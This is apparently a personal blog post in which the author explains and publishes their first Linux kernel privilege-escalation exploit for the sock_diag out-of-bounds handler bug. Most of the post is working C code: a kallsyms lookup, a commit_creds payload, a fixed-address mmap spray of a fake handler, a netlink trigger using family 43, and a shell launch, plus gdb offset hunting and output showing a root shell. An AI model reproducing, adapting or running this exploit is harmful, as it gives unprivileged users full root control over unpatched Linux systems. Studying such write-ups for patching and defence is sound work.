So my friend Nico tweeted that there is an „easy linux kernel privilege escalation“ and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some russians have already had an exploit for several months, and there seem to be several similar versions flying around the net, I discovered later. They differ in technique and reliability, and I guess others can do better than me.
I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:
Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.
So we should do exactly that! One of the hardest parts was actually
finding out how to send such a NetLink message, but I’ll come to that
later. Let’s first have a look at the code that was patched (this is
from net/core/sock_diag.c
):
static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
{
int err;
struct sock_diag_req *req = nlmsg_data(nlh);
const struct sock_diag_handler *hndl;
if (nlmsg_len(nlh) < sizeof(*req))
return -EINVAL;
/* check for "req->sdiag_family >= AF_MAX" goes here */
hndl = sock_diag_lock_handler(req->sdiag_family);
if (hndl == NULL)
err = -ENOENT;
else
err = hndl->dump(skb, nlh);
sock_diag_unlock_handler(hndl);
return err;
}
The function sock_diag_lock_handler()
locks a mutex and effectively
returns sock_diag_handlers[req->sdiag_family]
, i.e. the unsanitized
family number received in the NetLink request. Since AF_MAX
is 40,
we can effectively return memory from after the end of
sock_diag_handlers
(“out-of-bounds access”) if we specify a family
greater or equal to 40. This memory is accessed as a
struct sock_diag_handler {
__u8 family;
int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);
};
… and err = hndl->dump(skb, nlh);
calls the function pointed to in
the dump
field.
So we know: The Kernel follows a pointer to a sock_diag_handler
struct, and calls the function stored there. If we find some
suitable and (more or less) predictable value after the end of the
array, then we might store a specially crafted struct at the
referenced address that contains a pointer to some code that will
escalate the privileges of the current process. The main
function
looks like this:
int main(int argc, char **argv)
{
prepare_privesc_code();
spray_fake_handler((void *)0x0000000000010000);
trigger();
return execv("/bin/sh", (char *[]) { "sh", NULL });
}
First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.
/* privilege escalation code */
#define KERNCALL __attribute__((regparm(3)))
void * (*prepare_kernel_cred)(void *) KERNCALL;
void * (*commit_creds)(void *) KERNCALL;
/* match the signature of a sock_diag_handler dumper function */
int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)
{
commit_creds(prepare_kernel_cred(0));
return 0;
}
/* look up an exported Kernel symbol */
void *findksym(const char *sym)
{
void *p, *ret;
FILE *fp;
char s[1024];
size_t sym_len = strlen(sym);
fp = fopen("/proc/kallsyms", "r");
if(!fp)
err(-1, "cannot open kallsyms: fopen");
ret = NULL;
while(fscanf(fp, "%p %*c %1024s\n", &p, s) == 2) {
if(!!strncmp(sym, s, sym_len))
continue;
ret = p;
break;
}
fclose(fp);
return ret;
}
void prepare_privesc_code(void)
{
prepare_kernel_cred = findksym("prepare_kernel_cred");
commit_creds = findksym("commit_creds");
}
This is pretty standard, and you’ll find many variations of that in different exloits.
Now we spray a struct containing this function pointer over a sizable amount of memory:
void spray_fake_handler(const void *addr)
{
void *pp;
int po;
/* align to page boundary */
pp = (void *) ((ulong)addr & ~0xfffULL);
pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
if(pp == MAP_FAILED)
err(-1, "mmap");
struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };
for(po = 0; po < 0x10000; po += sizeof(hndl))
memcpy(pp + po, &hndl, sizeof(hndl));
}
The memory is mapped with MAP_FIXED
, which makes mmap()
take the
memory location as the de facto location, not merely a hint. The
location must be a multiple of the page size (which is 4096 or 0x1000
by default), and on most modern systems you cannot map the zero-page
(or other low pages), consult sysctl vm.mmap_min_addr
for this.
(This is to foil attempts to map code to the zero-page to take
advantage of a Kernel NULL pointer derefence.)
Now for the actual trigger. To get an idea of what we can do, we
should first inspect what comes after the sock_diag_handlers
array
in the currently running Kernel (this is only possible with root
permissions). Since the array is static to that file, we cannot look up
the symbol. Instead, we look up the address of a function that
accesses said array, sock_diag_register()
:
$ grep -w sock_diag_register /proc/kallsyms
ffffffff812b6aa2 T sock_diag_register
If this returns all zeroes, try grepping in /boot/System.map-$(uname -r)
instead. Then disassemble the function. I annotated the relevant
points with the corresponding C code:
$ sudo gdb -c /proc/kcore
(gdb) x/23i 0xffffffff812b6aa2
0xffffffff812b6aa2: push %rbp
0xffffffff812b6aa3: mov %rdi,%rbp
0xffffffff812b6aa6: push %rbx
0xffffffff812b6aa7: push %rcx
0xffffffff812b6aa8: cmpb $0x27,(%rdi) ; if (hndl->family >= AF_MAX)
0xffffffff812b6aab: ja 0xffffffff812b6ae5
0xffffffff812b6aad: mov $0xffffffff81668c20,%rdi
0xffffffff812b6ab4: mov $0xfffffff0,%ebx
0xffffffff812b6ab9: callq 0xffffffff813628ee ; mutex_lock(&sock_diag_table_mutex);
0xffffffff812b6abe: movzbl 0x0(%rbp),%eax
0xffffffff812b6ac2: cmpq $0x0,-0x7e7fe930(,%rax,8) ; if (sock_diag_handlers[hndl->family])
0xffffffff812b6acb: jne 0xffffffff812b6ad7
0xffffffff812b6acd: mov %rbp,-0x7e7fe930(,%rax,8) ; sock_diag_handlers[hndl->family] = hndl;
0xffffffff812b6ad5: xor %ebx,%ebx
0xffffffff812b6ad7: mov $0xffffffff81668c20,%rdi
0xffffffff812b6ade: callq 0xffffffff813628db
0xffffffff812b6ae3: jmp 0xffffffff812b6aea
0xffffffff812b6ae5: mov $0xffffffea,%ebx
0xffffffff812b6aea: pop %rdx
0xffffffff812b6aeb: mov %ebx,%eax
0xffffffff812b6aed: pop %rbx
0xffffffff812b6aee: pop %rbp
0xffffffff812b6aef: retq
The syntax cmpq $0x0,-0x7e7fe930(,%rax,8)
means: check if the value
at the address -0x7e7fe930
(which is a shorthand for
0xffffffff818016d0
on my system) plus 8 times %rax
is zero – eight
being the size of a pointer on a 64-bit system, and %rax
the address of the first argument to the function, but at the same
time, if you only take one 64-bit-slice, the first member of the (not
packed) struct, i.e. the family
field. So this line is an array
access, and we know that sock_diag_handlers
is located at -0x7e7fe930
.
(All these steps can actually be done without root permissions: You
can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r)
&& dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print
index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux
and start
GDB on the resulting ELF file. Only now you actually need to inspect
the main memory.)
(gdb) x/46xg -0x7e7fe930
0xffffffff818016d0: 0x0000000000000000 0x0000000000000000
0xffffffff818016e0: 0x0000000000000000 0x0000000000000000
0xffffffff818016f0: 0x0000000000000000 0x0000000000000000
0xffffffff81801700: 0x0000000000000000 0x0000000000000000
0xffffffff81801710: 0x0000000000000000 0x0000000000000000
0xffffffff81801720: 0x0000000000000000 0x0000000000000000
0xffffffff81801730: 0x0000000000000000 0x0000000000000000
0xffffffff81801740: 0x0000000000000000 0x0000000000000000
0xffffffff81801750: 0x0000000000000000 0x0000000000000000
0xffffffff81801760: 0x0000000000000000 0x0000000000000000
0xffffffff81801770: 0x0000000000000000 0x0000000000000000
0xffffffff81801780: 0x0000000000000000 0x0000000000000000
0xffffffff81801790: 0x0000000000000000 0x0000000000000000
0xffffffff818017a0: 0x0000000000000000 0x0000000000000000
0xffffffff818017b0: 0x0000000000000000 0x0000000000000000
0xffffffff818017c0: 0x0000000000000000 0x0000000000000000
0xffffffff818017d0: 0x0000000000000000 0x0000000000000000
0xffffffff818017e0: 0x0000000000000000 0x0000000000000000
0xffffffff818017f0: 0x0000000000000000 0x0000000000000000
0xffffffff81801800: 0x0000000000000000 0x0000000000000000
0xffffffff81801810: 0x0000000000000000 0x0000000000000000
0xffffffff81801820: 0x000000000000000a 0x0000000000017570
0xffffffff81801830: 0xffffffff8135a666 0xffffffff816740a0
(gdb) p (0xffffffff81801828- -0x7e7fe930)/8
$1 = 43
So now I know that in the Kernel I’m currently running, at the current
moment, sock_diag_handlers[43]
is 0x0000000000017570
, which is a
low address, but hopefully not too low. (Nico reported 0x17670, and a
current grml live cd in KVM
has 0x17470 there.) So we need to send a NetLink message with
SOCK_DIAG_BY_FAMILY
type set in the header, flags at least
NLM_F_REQUEST
and the family set to 43. This is what the trigger
does:
void trigger(void)
{
int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);
if (nl < 0)
err(-1, "socket");
struct {
struct nlmsghdr hdr;
struct sock_diag_req r;
} req;
memset(&req, 0, sizeof(req));
req.hdr.nlmsg_len = sizeof(req);
req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.hdr.nlmsg_flags = NLM_F_REQUEST;
req.r.sdiag_family = 43; /* guess right offset */
if(send(nl, &req, sizeof(req), 0) < 0)
err(-1, "send");
}
All done! Compiling might be difficult, since you need Kernel struct
definitions. I used -idirafter
and my Kernel headers.
$ make
gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c
$ ./kex
# id
uid=0(root) gid=0(root) groups=0(root)
Note: If something goes wrong, you’ll get a “general protection fault: 0000 [#1] SMP” that looks scary like this:
But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…
Update: The Protection Fault occurs when first following a bogous function pointer. After that, the exploit cannot longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)